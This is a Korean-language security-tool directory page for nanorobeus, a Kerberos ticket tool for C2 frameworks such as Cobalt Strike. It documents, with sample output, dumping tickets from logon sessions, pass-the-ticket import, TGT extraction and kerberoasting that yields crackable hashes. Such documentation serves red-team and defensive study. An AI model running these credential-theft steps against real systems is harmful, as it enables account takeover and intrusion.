Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
nanorobeus — Kerberos 티켓을 관리하기 위한 COFF 파일(BOF). | Kitploit
도구/GitHubGitHub/wavvs/nanorobeus
Password AttacksPost-ExploitationAuthenticationRed Teaming
GitHubwavvs/nanorobeus

nanorobeus

Kerberos 티켓을 관리하기 위한 COFF 파일(BOF).

저장소 보기
328313년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Nanorobeus

Kerberos 티켓을 관리하기 위한 COFF 파일(BOF)입니다.

지원 에이전트

  • Sliver
  • Brute Ratel
  • Cobalt Strike

명령어

luid - 현재 로그온 ID 가져오기

sessions [/luid:<0x0>| /all] - 로그온 세션 가져오기

klist [/luid:<0x0> | /all] - Kerberos 티켓 나열

dump [/luid:<0x0> | /all] - Kerberos 티켓 덤프

ptt /ticket:<base64> [/luid:<0x0>] - 로그온 세션으로 Kerberos 티켓 가져오기

purge [/luid:<0x0>] - Kerberos 티켓 제거

tgtdeleg /spn:<spn> - 현재 사용자에 대해 사용 가능한 TGT 검색

kerberoast /spn:<spn> - 지정된 SPN에 대해 Kerberoasting 수행

예제

현재 로그온 ID를 가져옵니다.

root@kitploit:~
=> nanorobeus64 luid

[+] Current LogonId: 0:0x19ea88e

현재 로그온 세션에 대한 자세한 정보를 가져옵니다.

root@kitploit:~
=> nanorobeus64 sessions

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

현재 로그온 세션에 대한 Kerberos 티켓을 나열합니다. 권한 상승 시 /all을 사용하여 모든 세션의 티켓을 나열하거나 /luid:0x0을 사용하여 지정된 로그온 세션의 티켓을 나열할 수 있습니다.

root@kitploit:~
=> nanorobeus64 klist

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
    ...(snip)...

현재 로그온 세션의 티켓을 덤프합니다. 권한 상승 시 /all을 사용하여 모든 세션의 티켓을 덤프하거나 /luid:0x0을 사용하여 지정된 로그온 세션의 티켓을 덤프할 수 있습니다.

root@kitploit:~
=> nanorobeus64 dump

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : [email protected]

[*] Cached tickets: (6)

	[0]
	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
	Ticket          : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)...

현재 로그온 세션에 티켓을 가져옵니다. 권한 상승 시 /luid:0x0을 사용하여 지정된 로그온 세션에 티켓을 가져올 수 있습니다.

root@kitploit:~
=> make_token network fortress.local test pass
=> nanorobeus64 ptt /ticket:doIFqjCCBaagAwIB...snip...

[+] Ticket successfully imported.

현재 로그온 세션에서 모든 Kerberos 티켓을 제거합니다. 권한 상승 시 /luid:0x0을 사용하여 지정된 로그온 세션의 티켓을 제거할 수 있습니다.

root@kitploit:~
=> nanorobeus64 purge

[+] Successfully purged tickets.

현재 사용자에 대해 사용 가능한 TGT를 검색합니다.

root@kitploit:~
=> nanorobeus64 tgtdeleg /spn:cifs/server.fortress.local

[*] Found the AP-REQ delegation ticket in the GSS-API output
[*] Authenticator etype: AES256_CTS_HMAC_SHA1
[*] Successfully extracted the service ticket session key
[*] Successfully decrypted authenticator
[+] Successfully extracted TGT: doIFeDCCBXSgAwIBBaEDAgEWooIEcjC...(snip)...

SPN을 지정하여 Kerberoasting을 수행합니다:

root@kitploit:~
=> nanorobeus64 kerberoast /spn:HTTP/server.fortress.local

[*] Target SPN: HTTP/server.fortress.local
[+] Hash: $krb5tgs$23$*$FORTRESS.LOCAL$HTTP/server.fortress.local*$ac5e2f4d28fd377...(snip)...

크레딧

  • Rubeus - https://github.com/GhostPack/Rubeus
  • mimikatz - https://github.com/gentilkiwi/mimikatz
  • kekeo - https://github.com/gentilkiwi/kekeo
도구 다운로드